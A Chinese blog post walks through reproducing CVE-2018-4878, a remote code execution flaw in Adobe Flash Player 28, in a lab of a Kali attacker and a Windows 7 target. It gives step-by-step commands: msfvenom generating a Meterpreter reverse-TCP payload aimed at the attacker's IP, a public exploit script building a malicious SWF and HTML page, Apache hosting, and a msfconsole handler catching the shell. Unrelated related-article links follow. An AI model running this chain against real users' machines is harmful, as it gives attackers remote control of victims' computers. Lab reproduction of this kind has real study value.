[漏洞复现]Adobe flash player 28(CVE-2018-4878)
攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。
环境:
- 渗透机 Kali Linux ip:192.168.43.177
- 靶机 Windows 7 sp1 192.168.43.196
- exp:cve-2018-4878.py 来自https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019
- flash: flashplayeractivex28.0.0.137.exe 下载地址链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
实验步骤
一、kali 使用 msfvenom 生成 shell 代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt
msfvenom的用法可参考 https://www.jianshu.com/p/dee2b171a0a0
下面是使用msfvenom的部分参数,是比较常用的
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助。
二、生成swf和html
git clone https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git
使用上面生成的payload替换cve-2018-4878.py中的payload
更改输出文件路径
执行cve-2018-4878.py,会生成两个文件
python cve-2018-4878.py
开启apache,将生成的两个文件拷贝到/var/www/html中
service apache2 start
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf
kali开启监听
#msfconsole启动
msfconsole
#使用handler监听模块
msf > use exploit/multi/handler
#回弹一个tcp连接
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
#设置kali渗透机的ip地址
msf exploit(handler) > set lhost 192.168.43.177
#设置监听端口,这个需跟上面msfvenom设置的端口一致
msf exploit(handler) > set lport 8888
#开启监听,等待靶机上线
msf exploit(handler) > exploit
靶机安装adobe flash player
访问 http://192.168.43.177/index2.html
kali getshell成功
meterpreter用法可参考 https://www.cnblogs.com/backlion/p/9484949.html
参考资料
https://blog.51cto.com/chenxinjie/2093653https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019/blob/master/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A.mdhttps://www.cnblogs.com/backlion/p/9484949.html
http://www.taodudu.cc/news/show-5705909.html
相关文章:
- WiFi学习知识点整理
- Windows C#调用命令行实现WIFI管理
- 11.19版本更新公告:全球总决赛版本确定 愁云使者来袭
- S9全球总决赛全网直播,腾讯云成最强辅助
- LOL全明星总决赛2014,中国电竞也患恐韩症?
- 内测,ai生成app原型即时设计
- 手机APP原型(prototype)设计工具Balsamiq Mockups
- 五款移动APP在线原型设计工具,值得收藏
- Qt 通过 QPainter 绘制坐标轴
- MATLAB自定义坐标轴
- matplotlib中坐标轴控制总结
- Kotlin实现简单的登录页面
- [Node]node.js实现登录注册
- Spring Boot + MyBatis :登录注册功能
- html表单注册跳转页面,出现一个问题,点击“注册”按钮页面进入注册表单后自动跳转回登录页面...
- 登录、注册设计
- Laravel5.8入门系列二,快速实现用户注册登录功能
- 音频格式转换这个方法简单又方便
- 如何将flac格式转换成mp3?
- flac格式怎么转换成mp3?
- flac格式如何转mp3,3种简单方法值得收藏
- 2010年12月证券从业资格考试预测题(附答案)②
- 战神引擎服务器维护中怎么解决,战神引擎提示:获取该区补丁失败.的解决方法...
- 战神服务器IP修改,战神引擎开区教程_多服务器架设多版本教程
- 星河战神显示服务器异常,腾讯星河战神黑屏闪退怎么解决
- 战神引擎php充值,第十讲 战神引擎支付代码安装和数据库排序规则修改
- 龙之战神微信登录服务器,37龙之战神服务器正式关服公告
- 战神引擎mud2没有mysql文件_战神引擎架设问题总结
- 战神引擎mud2没有mysql文件_战神引擎架设时新手报错集锦及修复方法
- 战神引擎php启动不了,phpStudy套件版战神引擎服务端架设教程
[漏洞复现]Adobe flash player 28(CVE-2018-4878)相关推荐
- fedora、centos、rhel安装Adobe Flash Player 28
切换到root用户 添加Adobe Repository Adobe Repository 32-bit x86 rpm -ivh http://linuxdownload.adobe.com/ado ...
- chrome启用flash_如何在Google Chrome中启用Adobe Flash Player
chrome启用flash Remember Adobe Flash player? It's that nifty software that lets websites embed videos ...
- Adobe Flash Player 32.0.0.371 绿色特别版
Adobe Flash Player 32 正式版例行更新,v32.0.0.371 这是最新详细版本号,Adobe采取和微软相似的更新策略,在每个月的第二个周二为产品发布安全更新.Adobe® Fla ...
- Adobe Flash Player 29.0.0.140官方正式版
Adobe Flash Player 29 正式版例行更新,v29.0.0.140 这是最新详细版本号,Adobe采取和微软相似的更新策略,在每个月的第二个周二为产品发布安全更新.Adobe® Fla ...
- Ubuntu安装adobe flash player插件(PPAPI和NPAPI)
CSDN GitHub Aderstep–紫夜阑珊-青伶巷草 AderXCoding/system/tools/flashplayer 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际 ...
- Fedora27 安装Adobe Flash Player PPAPI与NPAPI实现Firefox和Chromium视频播放
一.Adobe Flash Player PPAPI与NPAPI有什么区别 我们在打开网页视频时有时会弹出没有安装Flash插件的提示,此时就无法观看视频.Adobe Flash Player是浏览器 ...
- Flash Builder 找不到所需的Adobe Flash Player调试器版本的解决办法
Flash Builder在Debug时出现的问题:Flash Builder 找不到所需的Adobe Flash Player调试器版本 解决方法: 1. 进入Flash Builder的安装目录 ...
- Adobe Flash player 10 提示:Error#2044:未处理的IOErrorEvent. text=Error#2036:加载未完成 的解决方法
Adobe Flash player 10 提示:Error#2044:未处理的IOErrorEvent. text=Error#2036:加载未完成 的解决方法 参考文章: (1)Adobe Fla ...
- Adobe Flash Player 10.0.32.18
Adobe Flash Player软件简介 Adobe Flash Player是Adobe发布的浏览器Flash支持补丁.随着网络速度与品质的提升,越来越多的网站开始使用Flash来表达网站的内容 ...
最新文章
- 通过CPAN安装Perl模块
- Akka in JAVA(三)
- 考夫曼:破解大脑代码并创建真正的人工智能
- Qlikview 的服务器
- Android版本dp,Android中sp和dp区别
- 计算机的相关配置信息,win7系统查看电脑配置相关信息的方案介绍
- 【学生选课系统经典】C#与SQLSERVER连接:ASP.NET网站(服务器端,IIS发布)
- 《算法竞赛进阶指南》0.4二分
- 开放共赢,华为云WeLink生态联盟正式成立!
- #ifndef/#define/#endif 防止该头文件被重复引用
- 常见摄像机外部接口类型
- 网络设置里计算机为什么有两个字,一计算机网络操作题.doc
- 《透视盒马:新零售操作系统的秘密》
- 计算机工作组环境和域环境的区别
- 微电子封装技术未来发展面临的问题与挑战
- word文档打不开显示内容有问题要怎么解决?
- KITTI数据集数据初体验
- 增长:IT运维发展趋势报告
- (私人收藏)2019WER积木教育机器人赛(普及赛)解决方案-(全套)获取能源核心
- Portraiture3.5升级版磨皮滤镜插件使用效果教程
热门文章
- 磨刀霍霍:爬爬爬爬爬爬虫爬起来~
- FileMaker Pro 19 Advanced for mac(数据库工具)
- Java基础——利用DMO4J编写一个商品管理系统
- 【Python飞机大战游戏实战+笔记】黑马程序员Python教程项目实战记录【超详细】
- java的rsa加密_Java实现RSA加密算法
- XVid的历史和特点
- 男孩女孩 --- 《心 语》
- 自寅舍得分享:腾讯认证空间申请渠道大全?
- 简易的C语言判断输出月份有多少天
- 安卓之父的创业项目贱卖了!这个 31 岁的华人小哥接手,谷歌风投还投了钱!...